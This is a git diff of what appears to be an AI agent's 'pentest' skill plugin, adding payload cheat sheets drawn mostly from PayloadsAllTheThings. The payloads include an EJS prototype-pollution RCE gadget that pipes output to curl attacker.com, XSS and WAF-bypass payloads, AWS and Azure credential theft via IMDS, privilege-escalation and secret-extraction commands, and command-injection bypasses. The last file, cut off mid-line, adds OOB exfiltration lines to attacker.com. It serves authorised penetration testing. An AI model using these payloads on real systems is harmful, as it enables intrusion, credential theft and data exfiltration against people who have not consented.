plugins/pentest/skills/pentest/attacks/client-side/prototype-pollution/prototype-pollution-cheat-sheet.md index b824742..056fa94 100644 --- a/projects/pentest/.claude/skills/pentest/attacks/client-side/prototype-pollution/prototype-pollution-cheat-sheet.md +++ b/plugins/pentest/skills/pentest/attacks/client-side/prototype-pollution/prototype-pollution-cheat-sheet.md @@ -1044,6 +1044,40 @@ Permissions-Policy: geolocation=(), microphone=(), camera=() | ppmap | CLI scanner | `npm install -g ppmap` | | PPScan | Browser extension | Chrome/Firefox store | | Dasty | Research tool for gadgets | [GitHub/Research Paper](https://arxiv.org/abs/2311.03919) | +| pp-finder | CSPP/SSPP gadget discovery | github.com/yeswehack/pp-finder | +| silent-spring | Node.js RCE via SSPP | github.com/yuske/silent-spring | +| BlackFan/client-side-prototype-pollution | CSPP gadget collection | github.com/BlackFan/client-side-prototype-pollution | +| yuske/server-side-prototype-pollution | SSPP gadget DB (Node.js/NPM) | github.com/yuske/server-side-prototype-pollution | + + +## PATT RCE Gadgets + +### EJS Template Engine (SSPP → RCE) +```json +{ + "__proto__": { + "client": 1, + "escapeFunction": "JSON.stringify; process.mainModule.require('child_process').exec('id | curl http://attacker.com/ -d @-')" + } +} +``` + +### Node.js Environment Injection (SSPP → RCE) +```json +{ + "__proto__": { + "argv0": "node", + "shell": "node", + "NODE_OPTIONS": "--inspect=YOUR.oastify.com" + } +} +``` +Use Burp Collaborator DNS to confirm OOB execution. + +### Kibana CVE-2019-7609 pattern +Pollute label prototype → inject env vars → `child_process` shell execution. Canonical SSPP RCE reference. + + --- diff --git a/projects/pentest/.claude/skills/pentest/attacks/client-side/prototype-pollution/prototype-pollution-portswigger-labs-complete.md b/plugins/pentest/skills/pentest/attacks/client-side/prototype-pollution/prototype-pollution-portswigger-labs-complete.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/client-side/prototype-pollution/prototype-pollution-portswigger-labs-complete.md rename to plugins/pentest/skills/pentest/attacks/client-side/prototype-pollution/prototype-pollution-portswigger-labs-complete.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/client-side/prototype-pollution/prototype-pollution-quickstart.md b/plugins/pentest/skills/pentest/attacks/client-side/prototype-pollution/prototype-pollution-quickstart.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/client-side/prototype-pollution/prototype-pollution-quickstart.md rename to plugins/pentest/skills/pentest/attacks/client-side/prototype-pollution/prototype-pollution-quickstart.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/client-side/prototype-pollution/prototype-pollution-resources.md b/plugins/pentest/skills/pentest/attacks/client-side/prototype-pollution/prototype-pollution-resources.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/client-side/prototype-pollution/prototype-pollution-resources.md rename to plugins/pentest/skills/pentest/attacks/client-side/prototype-pollution/prototype-pollution-resources.md diff --git a/plugins/pentest/skills/pentest/attacks/client-side/xss/payloads/basic.md b/plugins/pentest/skills/pentest/attacks/client-side/xss/payloads/basic.md new file mode 100644 index 0000000..c1fe635 --- /dev/null +++ b/plugins/pentest/skills/pentest/attacks/client-side/xss/payloads/basic.md @@ -0,0 +1,75 @@ +--- +source: PayloadsAllTheThings +patt-path: XSS Injection/README.md +patt-url: https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/XSS%20Injection/README.md +last-curated: 2026-03-13 +priority: critical +--- + +# XSS — Basic Payloads + +## Script Tag + +```html + + + + +``` + +## Event Handlers + +```html + + + + + +\x3csVg/\x3e +``` + +```html +'">>"><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id&amp;#41;>\' +``` + +## Href / JavaScript URI + +```html +<a href="javascript:alert(1)">click</a> +<a href="javascript:void(0)" onclick="alert(document.domain)">click</a> +``` + +## SVG / Math + +```html +<svg><script>alert(1)</script></svg> +<math><mtext><table><mglyph><style><!--</style><img title="--&gt;&lt;img src=1 onerror=alert(1)&gt;"> +``` + +## Iframe + +```html +<iframe src="javascript:alert(1)"></iframe> +<iframe onload="alert(1)"></iframe> +``` + +*Full list: patt-fetcher agent → "XSS Injection"* diff --git a/plugins/pentest/skills/pentest/attacks/client-side/xss/payloads/bypass.md b/plugins/pentest/skills/pentest/attacks/client-side/xss/payloads/bypass.md new file mode 100644 index 0000000..f327869 --- /dev/null +++ b/plugins/pentest/skills/pentest/attacks/client-side/xss/payloads/bypass.md @@ -0,0 +1,95 @@ +--- +source: PayloadsAllTheThings +patt-path: XSS Injection/README.md +patt-url: https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/XSS%20Injection/README.md +last-curated: 2026-03-13 +priority: critical +--- + +# XSS — WAF Bypass Payloads + +## Encoding Variants + +```html +<!-- Hex encoding --> +<img src=x onerror="\x61\x6c\x65\x72\x74\x28\x31\x29"> +<a href="\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74:\x61\x6c\x65\x72\x74(1)"> + +<!-- HTML entity encoding --> +&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#49&#41 + +<!-- URL encoding in href --> +java%0ascript:alert(1) +java%09script:alert(1) +java%0Dscript:alert(1) +``` + +## Tag Alternatives (when `<script>` is blocked) + +```html +<img src=x onerror=alert(1)> +<svg/onload=alert(1)> +<body/onload=alert(1)> +<input/onfocus=alert(1) autofocus> +<video/onerror=alert(1)><source> +<audio src onerror=alert(1)> +<object data="javascript:alert(1)"> +``` + +## Case / Space Bypass + +```html +<ScRiPt>alert(1)</ScRiPt> +<SCRIPT>alert(1)</SCRIPT> +<img SrC=x OnErRoR=alert(1)> +<img src=x onerror=alert(1)> <!-- tab instead of space --> +<img/src=x/onerror=alert(1)> +``` + +## Tag Duplication (when WAF strips once) + +```html +<scr<script>ipt>alert(1)</scr</script>ipt> +<img src=x oneonerrorrror=alert(1)> +``` + +## Comment Bypass + +```html +<svg/onload=/**/alert(1)> +<img src=x onerror=al/**/ert(1)> +``` + +## Mutation XSS (mXSS) + +Payloads that mutate after being processed by innerHTML: +```html +<noscript><p title="</noscript><img src=x onerror=alert(1)>"> +<listing>&lt;img src=x onerror=alert(1)&gt;</listing> +<svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg> +<math><mtext><table><mglyph><style><!--</style><img onerror=alert(1) src></mglyph></table></mtext></math> +``` + +## Angular / Template Injection XSS + +``` +{{constructor.constructor('alert(1)')()}} +{{$on.constructor('alert(1)')()}} +``` + +## Backtick / Template Literal + +```html +<img src=x onerror=alert`1`> +<svg onload=alert`document.domain`> +``` + +## Filter Evasion with Newlines + +``` +<img +src=x +onerror=alert(1)> +``` + +*Full list: patt-fetcher agent → "XSS Injection"* diff --git a/plugins/pentest/skills/pentest/attacks/client-side/xss/payloads/dom.md b/plugins/pentest/skills/pentest/attacks/client-side/xss/payloads/dom.md new file mode 100644 index 0000000..c39e73f --- /dev/null +++ b/plugins/pentest/skills/pentest/attacks/client-side/xss/payloads/dom.md @@ -0,0 +1,117 @@ +--- +source: PayloadsAllTheThings +patt-path: XSS Injection/README.md +patt-url: https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/XSS%20Injection/README.md +last-curated: 2026-03-13 +priority: critical +--- + +# XSS — DOM-Based Payloads + +## Common Sources (attacker-controlled input) + +``` +document.URL +document.location +document.referrer +location.hash +location.search +location.href +window.name +postMessage data +localStorage / sessionStorage +``` + +## Dangerous Sinks + +| Sink | Risk | +|------|------| +| `innerHTML` | Executes HTML including event handlers | +| `outerHTML` | Same as innerHTML | +| `document.write()` | Writes raw HTML to page | +| `document.writeln()` | Same as write | +| `eval()` | Executes arbitrary JS | +| `setTimeout(string)` | Executes string as JS | +| `setInterval(string)` | Executes string as JS | +| `Function(string)` | Creates and executes function | +| `location.href = input` | Open redirect / javascript: | +| `src` / `href` attributes | javascript: URI | + +## DOM XSS Payloads (10 examples) + +```javascript +// 1. Hash-based +#"><img src=/ onerror=alert(document.domain)> + +// 2. Confirm variant +#-(confirm)(document.domain)// + +// 3. Semicolon injection +; alert(1);// + +// 4. SVG payload +<svg/onload=alert(document.domain)> + +// 5. eval via src +<img src=x onerror=eval(src) alt=xss> + +// 6. autofocus +<input autofocus onfocus=alert(1)> + +// 7. textarea autofocus +<textarea autofocus onfocus=alert(1)> + +// 8. details toggle +<details/open/ontoggle="alert`1`"> + +// 9. video +<video src=_ onloadstart="alert(1)"> + +// 10. pointer event +<div onpointerover="alert(45)">MOVE HERE</div> +``` + +## Exploiting innerHTML Sink + +```javascript +// Vulnerable code: +document.getElementById('output').innerHTML = location.hash.slice(1); + +// Payload in URL: +https://target.com/page#<img src=x onerror=alert(document.cookie)> +``` + +## Exploiting eval() Sink + +```javascript +// Vulnerable code: +eval("var q = '" + location.search.split('q=')[1] + "'"); + +// Payload: +?q=';alert(document.domain)// +``` + +## Exploiting document.write() Sink + +```javascript +// Vulnerable code: +document.write('<img src="' + location.search.split('img=')[1] + '">'); + +// Payload: +?img=x" onerror="alert(1) +``` + +## jQuery DOM Sinks + +```javascript +// Vulnerable: $(location.hash) +#<img src=x onerror=alert(1)> + +// Vulnerable: $().html(userInput) +<script>alert(1)</script> + +// Vulnerable: $(selector).attr('href', userInput) +javascript:alert(1) +``` + +*Full list: patt-fetcher agent → "XSS Injection"* diff --git a/projects/pentest/.claude/skills/pentest/attacks/client-side/xss/xss-bypass-techniques.md b/plugins/pentest/skills/pentest/attacks/client-side/xss/xss-bypass-techniques.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/client-side/xss/xss-bypass-techniques.md rename to plugins/pentest/skills/pentest/attacks/client-side/xss/xss-bypass-techniques.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/client-side/xss/xss-exploitation-techniques.md b/plugins/pentest/skills/pentest/attacks/client-side/xss/xss-exploitation-techniques.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/client-side/xss/xss-exploitation-techniques.md rename to plugins/pentest/skills/pentest/attacks/client-side/xss/xss-exploitation-techniques.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/client-side/xss/xss-portswigger-labs-complete.md b/plugins/pentest/skills/pentest/attacks/client-side/xss/xss-portswigger-labs-complete.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/client-side/xss/xss-portswigger-labs-complete.md rename to plugins/pentest/skills/pentest/attacks/client-side/xss/xss-portswigger-labs-complete.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/cloud-containers/aws/cloud-security.md b/plugins/pentest/skills/pentest/attacks/cloud-containers/aws/cloud-security.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/cloud-containers/aws/cloud-security.md rename to plugins/pentest/skills/pentest/attacks/cloud-containers/aws/cloud-security.md diff --git a/plugins/pentest/skills/pentest/attacks/cloud-containers/aws/payloads/techniques.md b/plugins/pentest/skills/pentest/attacks/cloud-containers/aws/payloads/techniques.md new file mode 100644 index 0000000..9463719 --- /dev/null +++ b/plugins/pentest/skills/pentest/attacks/cloud-containers/aws/payloads/techniques.md @@ -0,0 +1,123 @@ +--- +source: PayloadsAllTheThings +patt-path: AWS Amazon Bucket S3/README.md +patt-url: https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/AWS%20Amazon%20Bucket%20S3/README.md +last-curated: 2026-03-14 +priority: medium +--- + +# AWS — Attack Techniques Payloads + +## Quick Hits + +### IMDS v1 SSRF (no auth required) +``` +http://169.254.169.254/latest/meta-data/ +http://169.254.169.254/latest/meta-data/iam/security-credentials/ +http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME +http://169.254.169.254/latest/user-data +``` + +### IMDS v2 SSRF (requires PUT first — two-step) +```bash +# Step 1: get token (via SSRF if app supports PUT) +curl -X PUT -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" \ + http://169.254.169.254/latest/api/token + +# Step 2: use token +curl -H "X-aws-ec2-metadata-token: TOKEN" \ + http://169.254.169.254/latest/meta-data/iam/security-credentials/ +``` + +### S3 Bucket Discovery +```bash +# Test anonymous access +aws s3 ls s3://BUCKET --no-sign-request +aws s3 cp s3://BUCKET/file.txt . --no-sign-request + +# Directory listing via HTTP +curl http://BUCKET.s3.amazonaws.com/ +curl http://s3.amazonaws.com/BUCKET/ + +# S3Scanner +python3 s3scanner.py BUCKET +s3scanner scan --bucket-file buckets.txt +``` + +### Credential Abuse (post-SSRF / leaked creds) +```bash +export AWS_ACCESS_KEY_ID=AKIA... +export AWS_SECRET_ACCESS_KEY=... +export AWS_SESSION_TOKEN=... # if temporary creds + +aws sts get-caller-identity +aws iam list-attached-user-policies --user-name $(aws iam get-user --query User.UserName --output text) +aws iam list-user-policies --user-name USERNAME +``` + +## Extended List + +### IAM Enumeration +```bash +# What can I do? +aws iam list-attached-user-policies --user-name USER +aws iam get-policy-version --policy-arn ARN --version-id v1 +aws iam simulate-principal-policy --policy-source-arn ARN --action-names '*' + +# Assume another role +aws iam list-roles +aws sts assume-role --role-arn ARN --role-session-name test +``` + +### IAM Privilege Escalation Paths + +| Path | Required Permission | Command | +|------|---------------------|---------| +| Create access key for admin user | `iam:CreateAccessKey` | `aws iam create-access-key --user-name admin` | +| Attach admin policy to self | `iam:AttachUserPolicy` | `aws iam attach-user-policy --user-name SELF --policy-arn arn:aws:iam::aws:policy/AdministratorAccess` | +| Create new policy version | `iam:CreatePolicyVersion` | `aws iam create-policy-version --policy-arn ARN --policy-document file://admin.json --set-as-default` | +| Update Lambda code (with privileged role) | `lambda:UpdateFunctionCode` | `aws lambda update-function-code --function-name FUNC --zip-file fileb://shell.zip` | +| Pass role to EC2 | `iam:PassRole` + `ec2:RunInstances` | Launch EC2 with admin instance profile | + +### Secrets & Credential Locations +```bash +# Environment variables in Lambda +aws lambda get-function-configuration --function-name FUNC | jq .Environment + +# EC2 Parameter Store (SSM) +aws ssm describe-parameters +aws ssm get-parameter --name /app/db/password --with-decryption + +# Secrets Manager +aws secretsmanager list-secrets +aws secretsmanager get-secret-value --secret-id SECRETNAME +``` + +### S3 Data Exfiltration +```bash +# Recursive download +aws s3 sync s3://BUCKET . --no-sign-request + +# Look for sensitive files +aws s3 ls s3://BUCKET --recursive | grep -iE 'backup|password|key|secret|cred|\.env|\.pem|\.pfx' +``` + +## Bypass Variants + +| Restriction | Bypass | +|-------------|--------| +| IMDS v2 enforced | Try SSRF via redirect chaining (30x → IMDSv1 if not blocked) | +| S3 bucket policy | Check object ACL separately — bucket=private, object=public | +| SCP blocking `iam:*` | Pivot via Lambda role or EC2 instance profile | +| MFA required | Look for long-term access keys (`AKIA…`) — not MFA-protected | + +## Notes + +- **Tools**: Pacu, aws-cli, ScoutSuite, Prowler, CloudMapper, cloudsplaining, S3Scanner +- IMDS v1 is exploitable via SSRF in any app on the instance (no auth) +- Stolen session tokens (`ASIA…`) expire; stolen permanent keys (`AKIA…`) don't +- Use `Pacu` module `iam__privesc_scan` to auto-detect all escalation paths +- `aws sts get-caller-identity` is always allowed — safe enumeration start + +--- +*Full list: `patt-fetcher` agent → "AWS cloud attacks"* diff --git a/projects/pentest/.claude/skills/pentest/attacks/cloud-containers/azure/cloud-security.md b/plugins/pentest/skills/pentest/attacks/cloud-containers/azure/cloud-security.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/cloud-containers/azure/cloud-security.md rename to plugins/pentest/skills/pentest/attacks/cloud-containers/azure/cloud-security.md diff --git a/plugins/pentest/skills/pentest/attacks/cloud-containers/azure/payloads/techniques.md b/plugins/pentest/skills/pentest/attacks/cloud-containers/azure/payloads/techniques.md new file mode 100644 index 0000000..5ecbc52 --- /dev/null +++ b/plugins/pentest/skills/pentest/attacks/cloud-containers/azure/payloads/techniques.md @@ -0,0 +1,132 @@ +--- +source: PayloadsAllTheThings +patt-path: Methodology and Resources/Cloud - Azure Pentest.md +patt-url: https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Methodology%20and%20Resources/Cloud%20-%20Azure%20Pentest.md +last-curated: 2026-03-14 +priority: medium +--- + +# Azure — Attack Techniques Payloads + +## Quick Hits + +### Azure IMDS — Token Theft (from compromised VM) +```bash +# Get access token for management.azure.com +curl -s -H "Metadata:true" \ + "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" + +# Get token for storage +curl -s -H "Metadata:true" \ + "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://storage.azure.com/" + +# Get subscription info +curl -s -H "Metadata:true" \ + "http://169.254.169.254/metadata/instance?api-version=2021-02-01" +``` + +### SSRF → IMDS (via web app) +``` +http://169.254.169.254/metadata/instance?api-version=2021-02-01&format=json +http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/ +``` +> Must include header `Metadata: true` — embed in SSRF if app allows custom headers + +### Anonymous Blob Storage Access +```bash +# Test public container listing +curl https://ACCOUNT.blob.core.windows.net/?comp=list&include=metadata + +# Download blob without auth +curl https://ACCOUNT.blob.core.windows.net/CONTAINER/FILE + +# az CLI unauthenticated +az storage blob list --account-name ACCOUNT --container-name CONTAINER --auth-mode anonymous +``` + +## Extended List + +### ARM API with Stolen Token +```bash +TOKEN="eyJ0eXAiOi..."; SUB="00000000-0000-0000-0000-000000000000" + +curl -s -H "Authorization: Bearer $TOKEN" "https://management.azure.com/subscriptions?api-version=2020-01-01" +curl -s -H "Authorization: Bearer $TOKEN" "https://management.azure.com/subscriptions/$SUB/resources?api-version=2021-04-01" +curl -s -H "Authorization: Bearer $TOKEN" "https://management.azure.com/subscriptions/$SUB/providers/Microsoft.Authorization/roleAssignments?api-version=2022-04-01" +``` + +### Key Vault Secret Extraction +```bash +# List Key Vaults +az keyvault list --query '[].name' -o tsv + +# List secrets (requires Key Vault access policy) +az keyvault secret list --vault-name VAULTNAME + +# Get secret value +az keyvault secret show --vault-name VAULTNAME --name SECRETNAME --query value -o tsv + +# Via ARM API with token +curl -s -H "Authorization: Bearer $KV_TOKEN" \ + "https://VAULTNAME.vault.azure.net/secrets?api-version=7.2" +``` + +### Azure AD Enumeration (ROADtools) +```bash +roadrecon auth -u user@tenant.onmicrosoft.com -p PASSWORD # or --device-code +roadrecon gather && roadrecon gui # interactive graph at http://localhost:5000 +``` + +### Privilege Escalation Paths + +| Path | Role Required | Notes | +|------|---------------|-------| +| Global Admin → Subscription Owner | Global Administrator | `elevateAccess` endpoint | +| Contributor → Owner | User Access Administrator | Assign self Owner role | +| App Admin | Application Administrator | Reset service principal creds | +| Managed Identity | Attached to VM/Function | Get token from IMDS — no creds | +| Automation RunAs Account | Automation Contributor | Re-create expired certificate | + +### elevateAccess (GA → Owner) +```bash +# Elevate Global Admin to User Access Admin on root scope +curl -s -X POST -H "Authorization: Bearer $MGMT_TOKEN" \ + "https://management.azure.com/providers/Microsoft.Authorization/elevateAccess?api-version=2016-07-01" +``` + +### MicroBurst Enumeration +```powershell +Import-Module MicroBurst.psm1 + +# Find public blobs +Invoke-EnumerateAzureBlobs -Base TARGET + +# Get all domain info +Get-AzureDomainInfo -domain TARGET.onmicrosoft.com + +# Get RunAs accounts (often have high privileges) +Get-AzureRunAsAccounts + +# Dump App Service config (env vars / connection strings) +Get-AzureAppServiceConfig +``` + +## Bypass Variants + +| Restriction | Bypass | +|-------------|--------| +| IMDS requires `Metadata: true` header | Chain SSRF → open redirect on same host | +| Conditional Access blocks token use | Try different resource audiences (`graph.microsoft.com`, `storage.azure.com`) | +| MFA required for interactive login | Target service principals / managed identities — no MFA | +| Key Vault firewall (VNet only) | Pivot from compromised VM in same VNet | + +## Notes + +- **Tools**: ROADtools, MicroBurst, ScoutSuite, az CLI, Stormspotter, AADInternals +- Managed Identity tokens never need creds — IMDS always accessible from within Azure compute +- `roadrecon` produces an interactive graph of the entire tenant — users, groups, apps, SPs +- Token audience matters: `management.azure.com` ≠ `vault.azure.net` ≠ `graph.microsoft.com` +- Azure AD tokens valid 1h; refresh tokens 90 days (until revoked) + +--- +*Full list: `patt-fetcher` agent → "Azure cloud attacks"* diff --git a/projects/pentest/.claude/skills/pentest/attacks/cloud-containers/docker/cloud-security.md b/plugins/pentest/skills/pentest/attacks/cloud-containers/docker/cloud-security.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/cloud-containers/docker/cloud-security.md rename to plugins/pentest/skills/pentest/attacks/cloud-containers/docker/cloud-security.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/cloud-containers/gcp/cloud-security.md b/plugins/pentest/skills/pentest/attacks/cloud-containers/gcp/cloud-security.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/cloud-containers/gcp/cloud-security.md rename to plugins/pentest/skills/pentest/attacks/cloud-containers/gcp/cloud-security.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/cloud-containers/kubernetes/cloud-security.md b/plugins/pentest/skills/pentest/attacks/cloud-containers/kubernetes/cloud-security.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/cloud-containers/kubernetes/cloud-security.md rename to plugins/pentest/skills/pentest/attacks/cloud-containers/kubernetes/cloud-security.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/essential-skills/burp-suite/essential-skills-cheat-sheet.md b/plugins/pentest/skills/pentest/attacks/essential-skills/burp-suite/essential-skills-cheat-sheet.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/essential-skills/burp-suite/essential-skills-cheat-sheet.md rename to plugins/pentest/skills/pentest/attacks/essential-skills/burp-suite/essential-skills-cheat-sheet.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/essential-skills/burp-suite/essential-skills-index.md b/plugins/pentest/skills/pentest/attacks/essential-skills/burp-suite/essential-skills-index.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/essential-skills/burp-suite/essential-skills-index.md rename to plugins/pentest/skills/pentest/attacks/essential-skills/burp-suite/essential-skills-index.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/essential-skills/burp-suite/essential-skills-portswigger-labs-complete.md b/plugins/pentest/skills/pentest/attacks/essential-skills/burp-suite/essential-skills-portswigger-labs-complete.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/essential-skills/burp-suite/essential-skills-portswigger-labs-complete.md rename to plugins/pentest/skills/pentest/attacks/essential-skills/burp-suite/essential-skills-portswigger-labs-complete.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/essential-skills/burp-suite/essential-skills-quickstart.md b/plugins/pentest/skills/pentest/attacks/essential-skills/burp-suite/essential-skills-quickstart.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/essential-skills/burp-suite/essential-skills-quickstart.md rename to plugins/pentest/skills/pentest/attacks/essential-skills/burp-suite/essential-skills-quickstart.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/essential-skills/burp-suite/essential-skills-resources.md b/plugins/pentest/skills/pentest/attacks/essential-skills/burp-suite/essential-skills-resources.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/essential-skills/burp-suite/essential-skills-resources.md rename to plugins/pentest/skills/pentest/attacks/essential-skills/burp-suite/essential-skills-resources.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/essential-skills/methodology/README.md b/plugins/pentest/skills/pentest/attacks/essential-skills/methodology/README.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/essential-skills/methodology/README.md rename to plugins/pentest/skills/pentest/attacks/essential-skills/methodology/README.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/essential-skills/methodology/web-application-attacks.md b/plugins/pentest/skills/pentest/attacks/essential-skills/methodology/web-application-attacks.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/essential-skills/methodology/web-application-attacks.md rename to plugins/pentest/skills/pentest/attacks/essential-skills/methodology/web-application-attacks.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/essential-skills/playwright-automation.md b/plugins/pentest/skills/pentest/attacks/essential-skills/playwright-automation.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/essential-skills/playwright-automation.md rename to plugins/pentest/skills/pentest/attacks/essential-skills/playwright-automation.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/essential-skills/reporting/PROFESSIONAL_REPORT_STANDARD.md b/plugins/pentest/skills/pentest/attacks/essential-skills/reporting/PROFESSIONAL_REPORT_STANDARD.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/essential-skills/reporting/PROFESSIONAL_REPORT_STANDARD.md rename to plugins/pentest/skills/pentest/attacks/essential-skills/reporting/PROFESSIONAL_REPORT_STANDARD.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/essential-skills/reporting/report-templates.md b/plugins/pentest/skills/pentest/attacks/essential-skills/reporting/report-templates.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/essential-skills/reporting/report-templates.md rename to plugins/pentest/skills/pentest/attacks/essential-skills/reporting/report-templates.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/injection/command-injection/os-command-injection-cheat-sheet.md b/plugins/pentest/skills/pentest/attacks/injection/command-injection/os-command-injection-cheat-sheet.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/injection/command-injection/os-command-injection-cheat-sheet.md rename to plugins/pentest/skills/pentest/attacks/injection/command-injection/os-command-injection-cheat-sheet.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/injection/command-injection/os-command-injection-portswigger-labs-complete.md b/plugins/pentest/skills/pentest/attacks/injection/command-injection/os-command-injection-portswigger-labs-complete.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/injection/command-injection/os-command-injection-portswigger-labs-complete.md rename to plugins/pentest/skills/pentest/attacks/injection/command-injection/os-command-injection-portswigger-labs-complete.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/injection/command-injection/os-command-injection-quickstart.md b/plugins/pentest/skills/pentest/attacks/injection/command-injection/os-command-injection-quickstart.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/injection/command-injection/os-command-injection-quickstart.md rename to plugins/pentest/skills/pentest/attacks/injection/command-injection/os-command-injection-quickstart.md diff --git a/plugins/pentest/skills/pentest/attacks/injection/command-injection/payloads/bypass.md b/plugins/pentest/skills/pentest/attacks/injection/command-injection/payloads/bypass.md new file mode 100644 index 0000000..11c06a6 --- /dev/null +++ b/plugins/pentest/skills/pentest/attacks/injection/command-injection/payloads/bypass.md @@ -0,0 +1,105 @@ +--- +source: PayloadsAllTheThings +patt-path: Command Injection/README.md +patt-url: https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Command%20Injection/README.md +last-curated: 2026-03-13 +priority: critical +--- + +# Command Injection — Filter Bypass Payloads + +## IFS Bypass (space filter) + +```bash +cat${IFS}/etc/passwd +cat${IFS}/etc/shadow +ls${IFS}-la${IFS}/home +{cat,/etc/passwd} +{ls,-la,/home} +X=$'cat\x20/etc/passwd'&&$X +``` + +## Wildcard / Glob Bypass + +```bash +/???/??t /???/p??s?? # /bin/cat /etc/passwd +/???/c?t /etc/passwd +/b??/cat /etc/passwd +c?t /etc/passwd +ca* /etc/passwd +``` + +## Base64 Encoding + +```bash +echo d2hvYW1p | base64 -d | bash # whoami +echo Y2F0IC9ldGMvcGFzc3dk | base64 -d | bash # cat /etc/passwd +`echo "d2hvYW1p" | base64 -d` +$(echo "aWQ=" | base64 -d) +``` + +## Hex Encoding + +```bash +$(echo -e "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64") +`printf "\x77\x68\x6f\x61\x6d\x69"` +``` + +## Quote Breaking + +```bash +w'h'o'am'i +w"h"o"am"i +wh\oami +cat /e''tc/pa''sswd +``` + +## Variable Expansion + +```bash +a=c;b=at;$a$b /etc/passwd +cmd=whoami;$cmd +$'\x77\x68\x6f\x61\x6d\x69' # $'...' ANSI-C quoting +``` + +## $@ and $* Bypass + +```bash +who$@ami +wh$*oami +cat$@/etc/passwd +``` + +## Brace Expansion + +```bash +{l,-la}s +{c,}at /etc/passwd +``` + +## Newline as Separator + +```bash +%0a +%0d%0a +\n +``` + +## Backslash Continuation + +```bash +wh\ +oami +cat /et\ +c/passwd +``` + +## Reading Without cat + +```bash +while read l; do echo $l; done < /etc/passwd +< /etc/passwd +tr '' '\n' < /etc/passwd +``` + +*Full list: patt-fetcher agent → "Command Injection"* diff --git a/plugins/pentest/skills/pentest/attacks/injection/command-injection/payloads/unix.md b/plugins/pentest/skills/pentest/attacks/injection/command-injection/payloads/unix.md new file mode 100644 index 0000000..a5b2e95 --- /dev/null +++ b/plugins/pentest/skills/pentest/attacks/injection/command-injection/payloads/unix.md @@ -0,0 +1,89 @@ +--- +source: PayloadsAllTheThings +patt-path: Command Injection/README.md +patt-url: https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Command%20Injection/README.md +last-curated: 2026-03-13 +priority: critical +--- + +# Command Injection — Unix Payloads + +## Basic Separators + +```bash +; cat /etc/passwd +& cat /etc/passwd +| cat /etc/passwd +&& cat /etc/passwd +|| cat /etc/passwd +%0a cat /etc/passwd # URL-encoded newline +%0d%0a cat /etc/passwd # CRLF +``` + +## Command Substitution + +```bash +`cat /etc/passwd` +$(cat /etc/passwd) +$(id) +`id` +$(whoami) +``` + +## Blind — Time-Based + +```bash +; sleep 5 +& sleep 5 +| sleep 5 +&& sleep 5 +`sleep 5` +$(sleep 5) +; ping -c 5 127.0.0.1 +; if [ $(whoami|cut -c 1) == r ]; then sleep 5; fi +``` + +## OOB — DNS Exfiltration + +```bash +; nslookup attacker.com +; dig attacker.com +; for i in $(cat /etc/passwd|base64 -w 0); do host $i.attacker.com; done +; curl http://attacker.com/?d=$(whoami) +; wget 